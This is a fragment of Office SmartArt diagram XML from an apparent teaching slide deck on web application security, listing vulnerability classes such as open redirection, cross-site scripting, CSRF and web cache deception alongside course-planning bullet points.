    </dgm:pt>
    <dgm:pt modelId="{8CE8192F-1E09-084D-A7ED-1FB0E238CF7A}" type="pres">
      <dgm:prSet presAssocID="{CD097AFE-F962-4DA6-8DF4-ABBDF6BF32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3D0D0C-3749-674E-9F67-2D0CEE401B2A}" type="presOf" srcId="{B5D591CF-F7CE-4A6E-8C96-675A5B0E311A}" destId="{CD17EB8B-2D18-E24F-8D8A-9A1608CD0338}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{2BCAA73C-23BC-D245-B815-C53BC9C1FAB7}" type="presOf" srcId="{B0CE5EA9-D36B-47DE-9C71-7B5ED19AA919}" destId="{BD131630-A37A-E449-A8A0-CBE2DDBA9B8E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{BDA3A580-CD83-4F32-BA31-DEBE2EA6C97D}" srcId="{60EAB597-22F0-4F40-BFC3-7FB8F80118A7}" destId="{B5D591CF-F7CE-4A6E-8C96-675A5B0E311A}" srcOrd="0" destOrd="0" parTransId="{68DC5EE5-F3C9-4BE7-81CF-B83A36375962}" sibTransId="{ABF32C9B-86D5-4E99-A50F-90969893C05D}"/>
    <dgm:cxn modelId="{EA75DA9C-9AB9-F640-AD5B-8521084E1474}" type="presOf" srcId="{F6358C29-2F16-45FF-BA27-11FA336BB2B8}" destId="{D077A4D8-CD8E-5646-9AF4-D88B4661AEDD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{3C10D9C3-52BE-4A72-AC96-2DD6BE3C9BA3}" srcId="{60EAB597-22F0-4F40-BFC3-7FB8F80118A7}" destId="{F6358C29-2F16-45FF-BA27-11FA336BB2B8}" srcOrd="1" destOrd="0" parTransId="{74931AAE-B682-4699-8AE3-E6E72077AA99}" sibTransId="{46D032B4-8342-4886-8552-5E760BB0A3E4}"/>
    <dgm:cxn modelId="{ED5888D7-B284-364E-913E-13CAD24F49F3}" type="presOf" srcId="{CD097AFE-F962-4DA6-8DF4-ABBDF6BF3281}" destId="{8CE8192F-1E09-084D-A7ED-1FB0E238CF7A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{0A9719DA-EA2A-42D7-B004-9926112F5938}" srcId="{60EAB597-22F0-4F40-BFC3-7FB8F80118A7}" destId="{B0CE5EA9-D36B-47DE-9C71-7B5ED19AA919}" srcOrd="2" destOrd="0" parTransId="{6700026F-4B26-4C50-969E-924290722B89}" sibTransId="{E4CDB8BA-154C-425A-BB42-E170FACC50D3}"/>
    <dgm:cxn modelId="{501387DC-FB04-4C82-9A80-7BF8EFAC06B3}" srcId="{60EAB597-22F0-4F40-BFC3-7FB8F80118A7}" destId="{CD097AFE-F962-4DA6-8DF4-ABBDF6BF3281}" srcOrd="3" destOrd="0" parTransId="{5ABEC504-A1CF-46E6-9D9E-C09C25D2C643}" sibTransId="{2226FA9B-A186-44FC-93BE-0EDD0F5B438D}"/>
    <dgm:cxn modelId="{EABE49E9-7DFD-7844-A996-656CCF96CEDE}" type="presOf" srcId="{60EAB597-22F0-4F40-BFC3-7FB8F80118A7}" destId="{5F1A6E51-AE5B-DA4B-A806-5D0B159E2F34}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{D9478FC2-6CEF-9942-BC30-DD8DDE8FF6B1}" type="presParOf" srcId="{5F1A6E51-AE5B-DA4B-A806-5D0B159E2F34}" destId="{CD17EB8B-2D18-E24F-8D8A-9A1608CD0338}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{3F2D2002-A0A8-114E-BD08-B4146D048F32}" type="presParOf" srcId="{5F1A6E51-AE5B-DA4B-A806-5D0B159E2F34}" destId="{C0843484-3BD8-D947-A4CE-38BC5E868A4D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{C36F6F9A-1CE0-EF47-BE27-7D7C7578C0E5}" type="presParOf" srcId="{5F1A6E51-AE5B-DA4B-A806-5D0B159E2F34}" destId="{D077A4D8-CD8E-5646-9AF4-D88B4661AEDD}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{920A54A2-742D-8C47-AE47-1DE7CF079456}" type="presParOf" srcId="{5F1A6E51-AE5B-DA4B-A806-5D0B159E2F34}" destId="{1375A6B7-DBA7-3745-9584-370CC74609EE}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{8D87AF0D-6061-D84A-8172-3506ADE76318}" type="presParOf" srcId="{5F1A6E51-AE5B-DA4B-A806-5D0B159E2F34}" destId="{BD131630-A37A-E449-A8A0-CBE2DDBA9B8E}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{B6576F23-7F5F-014E-8A14-0AEC00126758}" type="presParOf" srcId="{5F1A6E51-AE5B-DA4B-A806-5D0B159E2F34}" destId="{AD7DD55D-EB0F-4D4D-A5CF-AB1F895258E3}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{74C0DB40-D778-C84D-B3BC-320D12734191}" type="presParOf" srcId="{5F1A6E51-AE5B-DA4B-A806-5D0B159E2F34}" destId="{8CE8192F-1E09-084D-A7ED-1FB0E238CF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6253C9-26B5-4EB2-83F7-DA48E7BE7AF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CD03E9-3E4D-4ACD-9E4D-D51561963EE5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Open redirection</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C48E902B-AD4F-4EE2-B8BE-0D076D51286E}" type="parTrans" cxnId="{9A7567F3-D422-43BE-8F54-E0E9624A4119}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BC4CA525-659F-4E75-8932-2E8EEF1A2E3F}" type="sibTrans" cxnId="{9A7567F3-D422-43BE-8F54-E0E9624A4119}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9A652217-38C6-40C3-9FFE-6C2A6FB91EE6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Cross Site Scripting </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9F9625E5-C073-4070-B375-A0EC73565BDF}" type="parTrans" cxnId="{909066E7-7E0F-4FD2-A38B-7F2CDECDE41D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{245B1186-6D71-4A48-B81B-26BFEB84FCF1}" type="sibTrans" cxnId="{909066E7-7E0F-4FD2-A38B-7F2CDECDE41D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{88800F75-8003-479E-876F-A42131E3600D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Cross Site request forgery</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{924DB9B8-256C-4992-B925-BE3E654A67F1}" type="parTrans" cxnId="{BE345DBA-88C9-4BC1-8D59-7AEB112C141D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{94DF1131-2522-422A-BC8F-9A7CBF3C7BAB}" type="sibTrans" cxnId="{BE345DBA-88C9-4BC1-8D59-7AEB112C141D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2C31F131-5333-484B-9B10-B424281B6B2F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Web cache deception </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B063012F-419E-4DDE-8ED4-51B3562887F2}" type="parTrans" cxnId="{685CF7AC-C562-45A7-9079-8CEF42C823FA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0545DB39-CDE2-4F1C-A124-082B119DB3CD}" type="sibTrans" cxnId="{685CF7AC-C562-45A7-9079-8CEF42C823FA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5BE507E1-73EA-D84C-999D-150437CB684C}" type="pres">
      <dgm:prSet presAssocID="{356253C9-26B5-4EB2-83F7-DA48E7BE7AF8}" presName="linear" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B8597640-7894-2246-B47F-58FB05426381}" type="pres">
      <dgm:prSet presAssocID="{02CD03E9-3E4D-4ACD-9E4D-D51561963E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944C20-BA41-1D45-9853-C0CAB508B7DC}" type="pres">
      <dgm:prSet presAssocID="{BC4CA525-659F-4E75-8932-2E8EEF1A2E3F}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6860F821-3AEA-764E-AF51-03E6BA612772}" type="pres">
      <dgm:prSet presAssocID="{9A652217-38C6-40C3-9FFE-6C2A6FB91E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78179E-79B0-3A47-A432-241F08A254CB}" type="pres">
      <dgm:prSet presAssocID="{245B1186-6D71-4A48-B81B-26BFEB84FCF1}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F30445AD-291C-B245-8CFF-9D81BF096E93}" type="pres">
      <dgm:prSet presAssocID="{88800F75-8003-479E-876F-A42131E360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8302A9-1FDA-E04A-BDE3-89821F2221BF}" type="pres">
      <dgm:prSet presAssocID="{94DF1131-2522-422A-BC8F-9A7CBF3C7BAB}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0153DCCF-0C2D-4F4F-862E-20F0FFDBD5F4}" type="pres">
      <dgm:prSet presAssocID="{2C31F131-5333-484B-9B10-B424281B6B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88B6406-9938-3349-8E47-4170850C1F5D}" type="presOf" srcId="{356253C9-26B5-4EB2-83F7-DA48E7BE7AF8}" destId="{5BE507E1-73EA-D84C-999D-150437CB684C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{E9A39F22-29AC-084B-80D8-B1A490D38BAC}" type="presOf" srcId="{9A652217-38C6-40C3-9FFE-6C2A6FB91EE6}" destId="{6860F821-3AEA-764E-AF51-03E6BA612772}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{54F03854-BA13-B743-99AC-25B0FF089BDB}" type="presOf" srcId="{88800F75-8003-479E-876F-A42131E3600D}" destId="{F30445AD-291C-B245-8CFF-9D81BF096E93}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{BBA58669-4153-EE4A-9898-63F906F72204}" type="presOf" srcId="{02CD03E9-3E4D-4ACD-9E4D-D51561963EE5}" destId="{B8597640-7894-2246-B47F-58FB05426381}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{685CF7AC-C562-45A7-9079-8CEF42C823FA}" srcId="{356253C9-26B5-4EB2-83F7-DA48E7BE7AF8}" destId="{2C31F131-5333-484B-9B10-B424281B6B2F}" srcOrd="3" destOrd="0" parTransId="{B063012F-419E-4DDE-8ED4-51B3562887F2}" sibTransId="{0545DB39-CDE2-4F1C-A124-082B119DB3CD}"/>
    <dgm:cxn modelId="{5D428EB4-B052-A542-820F-D7CEA5CD9F58}" type="presOf" srcId="{2C31F131-5333-484B-9B10-B424281B6B2F}" destId="{0153DCCF-0C2D-4F4F-862E-20F0FFDBD5F4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{BE345DBA-88C9-4BC1-8D59-7AEB112C141D}" srcId="{356253C9-26B5-4EB2-83F7-DA48E7BE7AF8}" destId="{88800F75-8003-479E-876F-A42131E3600D}" srcOrd="2" destOrd="0" parTransId="{924DB9B8-256C-4992-B925-BE3E654A67F1}" sibTransId="{94DF1131-2522-422A-BC8F-9A7CBF3C7BAB}"/>
    <dgm:cxn modelId="{909066E7-7E0F-4FD2-A38B-7F2CDECDE41D}" srcId="{356253C9-26B5-4EB2-83F7-DA48E7BE7AF8}" destId="{9A652217-38C6-40C3-9FFE-6C2A6FB91EE6}" srcOrd="1" destOrd="0" parTransId="{9F9625E5-C073-4070-B375-A0EC73565BDF}" sibTransId="{245B1186-6D71-4A48-B81B-26BFEB84FCF1}"/>
    <dgm:cxn modelId="{9A7567F3-D422-43BE-8F54-E0E9624A4119}" srcId="{356253C9-26B5-4EB2-83F7-DA48E7BE7AF8}" destId="{02CD03E9-3E4D-4ACD-9E4D-D51561963EE5}" srcOrd="0" destOrd="0" parTransId="{C48E902B-AD4F-4EE2-B8BE-0D076D51286E}" sibTransId="{BC4CA525-659F-4E75-8932-2E8EEF1A2E3F}"/>
    <dgm:cxn modelId="{499EA7BC-1988-1641-AE07-CFECB87AA131}" type="presParOf" srcId="{5BE507E1-73EA-D84C-999D-150437CB684C}" destId="{B8597640-7894-2246-B47F-58FB05426381}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{DDB76751-BF9A-2543-8730-B78C976A416C}" type="presParOf" srcId="{5BE507E1-73EA-D84C-999D-150437CB684C}" destId="{D0944C20-BA41-1D45-9853-C0CAB508B7DC}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{D183FC9C-2472-634D-AB4C-1247B65B7FFA}" type="presParOf" srcId="{5BE507E1-73EA-D84C-999D-150437CB684C}" destId="{6860F821-3AEA-764E-AF51-03E6BA612772}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{E8A85E85-6B63-574C-B02D-A0C710CBD712}" type="presParOf" srcId="{5BE507E1-73EA-D84C-999D-150437CB684C}" destId="{C678179E-79B0-3A47-A432-241F08A254CB}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{724D67DF-6EB6-3F4B-AD4E-97EB91FA1E0B}" type="presParOf" srcId="{5BE507E1-73EA-D84C-999D-150437CB684C}" destId="{F30445AD-291C-B245-8CFF-9D81BF096E93}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{3F8C9B69-327C-7242-A2D8-45F5A00F9D19}" type="presParOf" srcId="{5BE507E1-73EA-D84C-999D-150437CB684C}" destId="{8E8302A9-1FDA-E04A-BDE3-89821F2221BF}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{A4965BD4-1A20-2B41-B21C-7448AB79EC61}" type="presParOf" srcId="{5BE507E1-73EA-D84C-999D-150437CB684C}" destId="{0153DCCF-0C2D-4F4F-862E-20F0FFDBD5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785379-7F37-40E3-9BBD-2853C2C817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D5B1C7-1F2C-43F9-9E71-6B8E923DE39F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>There is too much to teach in web application security</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EF94141C-5B07-4CE8-AE05-AF58DF6C4241}" type="parTrans" cxnId="{BEE0F347-B89C-4FFA-9739-35D5DDD9172C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{04D74B94-72AF-4872-AD44-504E52236DFB}" type="sibTrans" cxnId="{BEE0F347-B89C-4FFA-9739-35D5DDD9172C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BC4001AB-29DB-4438-89F5-D76925A5CB00}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Focus on one topic</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{55684607-A699-4780-92ED-0CC7A019AF98}" type="parTrans" cxnId="{365FDD87-2D49-4D53-8586-678AB3A15453}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CD187FF3-1A2C-4D2D-91D0-FA2193973207}" type="sibTrans" cxnId="{365FDD87-2D49-4D53-8586-678AB3A15453}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C7DF1C2E-4129-45E3-A56D-F716E0A5DB69}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Provide a template for learning about other topics on your own</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{624F0D81-1DFA-4014-8811-7A99844F8A81}" type="parTrans" cxnId="{F0F0013C-5FA4-49B4-9D66-5852B25F8433}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FA5923A7-6B7A-4B01-8B3B-1297AEFF1BDF}" type="sibTrans" cxnId="{F0F0013C-5FA4-49B4-9D66-5852B25F8433}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DD311AE4-A3DB-47A0-8C2F-91A4BF3521D4}" type="pres">
      <dgm:prSet presAssocID="{E7785379-7F37-40E3-9BBD-2853C2C8179D}" presName="root" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0B153A73-B9FF-433C-A215-5AE77120A988}" type="pres">
      <dgm:prSet presAssocID="{80D5B1C7-1F2C-43F9-9E71-6B8E923DE39F}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{795AC5E9-8F99-49E7-ABC0-379BFAA1566B}" type="pres">
      <dgm:prSet presAssocID="{80D5B1C7-1F2C-43F9-9E71-6B8E923DE39F}" presName="bgRect" presStyleLbl="bgShp" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{08988B88-75FE-411B-95AD-0F40FF44CDC8}" type="pres">
      <dgm:prSet presAssocID="{80D5B1C7-1F2C-43F9-9E71-6B8E923DE3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2FAF387-A0E3-4E20-B06F-EC1F353F71B9}" type="pres">
      <dgm:prSet presAssocID="{80D5B1C7-1F2C-43F9-9E71-6B8E923DE39F}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7767A5FB-64A8-4315-B4CA-C9E8BA340424}" type="pres">
      <dgm:prSet presAssocID="{80D5B1C7-1F2C-43F9-9E71-6B8E923DE39F}" presName="parTx" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B23335ED-F16F-4162-9B72-3066DF24004F}" type="pres">
      <dgm:prSet presAssocID="{04D74B94-72AF-4872-AD44-504E52236DFB}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{16F15EE6-C9A6-47C0-9A4A-5EB2EB03BA40}" type="pres">
      <dgm:prSet presAssocID="{BC4001AB-29DB-4438-89F5-D76925A5CB00}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A53C9AAB-58E6-4593-AFA9-E2DE8B2983AA}" type="pres">
      <dgm:prSet presAssocID="{BC4001AB-29DB-4438-89F5-D76925A5CB00}" presName="bgRect" presStyleLbl="bgShp" presStyleIdx="1" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9DC21E0E-7BD9-4A22-BCE0-C878258E5DAE}" type="pres">
      <dgm:prSet presAssocID="{BC4001AB-29DB-4438-89F5-D76925A5CB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48DF29D-DF6B-4DAA-9E6A-32A9F421C1FD}" type="pres">
      <dgm:prSet presAssocID="{BC4001AB-29DB-4438-89F5-D76925A5CB00}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9367BC75-8AE8-4899-8891-B93C73707DF2}" type="pres">
      <dgm:prSet presAssocID="{BC4001AB-29DB-4438-89F5-D76925A5CB00}" presName="parTx" presStyleLbl="revTx" presStyleIdx="1" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5853C95E-9E6C-442D-90FB-71C39CF73D70}" type="pres">
      <dgm:prSet presAssocID="{CD187FF3-1A2C-4D2D-91D0-FA2193973207}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FB186F4C-6789-41B5-8D69-7D0D078EE2EC}" type="pres">
      <dgm:prSet presAssocID="{C7DF1C2E-4129-45E3-A56D-F716E0A5DB69}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E1C3C528-0F6E-4C81-A64C-84B6EE70C701}" type="pres">
      <dgm:prSet presAssocID="{C7DF1C2E-4129-45E3-A56D-F716E0A5DB69}" presName="bgRect" presStyleLbl="bgShp" presStyleIdx="2" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E3FDCEE4-A1B2-41B7-937A-55B0692BDE61}" type="pres">
      <dgm:prSet presAssocID="{C7DF1C2E-4129-45E3-A56D-F716E0A5DB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55754E4-8FEB-4BB9-9AF9-FFF6342FFF62}" type="pres">
      <dgm:prSet presAssocID="{C7DF1C2E-4129-45E3-A56D-F716E0A5DB69}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9F954E8B-30F7-4981-8D84-4B62D66B4F65}" type="pres">
      <dgm:prSet presAssocID="{C7DF1C2E-4129-45E3-A56D-F716E0A5DB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0F0013C-5FA4-49B4-9D66-5852B25F8433}" srcId="{E7785379-7F37-40E3-9BBD-2853C2C8179D}" destId="{C7DF1C2E-4129-45E3-A56D-F716E0A5DB69}" srcOrd="2" destOrd="0" parTransId="{624F0D81-1DFA-4014-8811-7A99844F8A81}" sibTransId="{FA5923A7-6B7A-4B01-8B3B-1297AEFF1BDF}"/>
    <dgm:cxn modelId="{BEE0F347-B89C-4FFA-9739-35D5DDD9172C}" srcId="{E7785379-7F37-40E3-9BBD-2853C2C8179D}" destId="{80D5B1C7-1F2C-43F9-9E71-6B8E923DE39F}" srcOrd="0" destOrd="0" parTransId="{EF94141C-5B07-4CE8-AE05-AF58DF6C4241}" sibTransId="{04D74B94-72AF-4872-AD44-504E52236DFB}"/>
    <dgm:cxn modelId="{5658996C-2BDE-4799-93A0-8BB507B4EC82}" type="presOf" srcId="{E7785379-7F37-40E3-9BBD-2853C2C8179D}" destId="{DD311AE4-A3DB-47A0-8C2F-91A4BF3521D4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{365FDD87-2D49-4D53-8586-678AB3A15453}" srcId="{E7785379-7F37-40E3-9BBD-2853C2C8179D}" destId="{BC4001AB-29DB-4438-89F5-D76925A5CB00}" srcOrd="1" destOrd="0" parTransId="{55684607-A699-4780-92ED-0CC7A019AF98}" sibTransId="{CD187FF3-1A2C-4D2D-91D0-FA2193973207}"/>
    <dgm:cxn modelId="{7ACEDFA2-070D-457C-B265-2F34DE0A3E33}" type="presOf" srcId="{BC4001AB-29DB-4438-89F5-D76925A5CB00}" destId="{9367BC75-8AE8-4899-8891-B93C73707DF2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{F7A896A6-5EB6-42CE-91D8-63D80B773528}" type="presOf" srcId="{C7DF1C2E-4129-45E3-A56D-F716E0A5DB69}" destId="{9F954E8B-30F7-4981-8D84-4B62D66B4F65}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{899D11AD-8255-4F01-A318-D34195093534}" type="presOf" srcId="{80D5B1C7-1F2C-43F9-9E71-6B8E923DE39F}" destId="{7767A5FB-64A8-4315-B4CA-C9E8BA340424}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{D501A2AE-A84E-4250-A880-DA1F22B8F994}" type="presParOf" srcId="{DD311AE4-A3DB-47A0-8C2F-91A4BF3521D4}" destId="{0B153A73-B9FF-433C-A215-5AE77120A988}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{E27008D8-F441-4943-BDE5-3B12C6FBD774}" type="presParOf" srcId="{0B153A73-B9FF-433C-A215-5AE77120A988}" destId="{795AC5E9-8F99-49E7-ABC0-379BFAA1566B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{C8A1852E-BE81-4251-96AB-A651C5644A9A}" type="presParOf" srcId="{0B153A73-B9FF-433C-A215-5AE77120A988}" destId="{08988B88-75FE-411B-95AD-0F40FF44CDC8}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
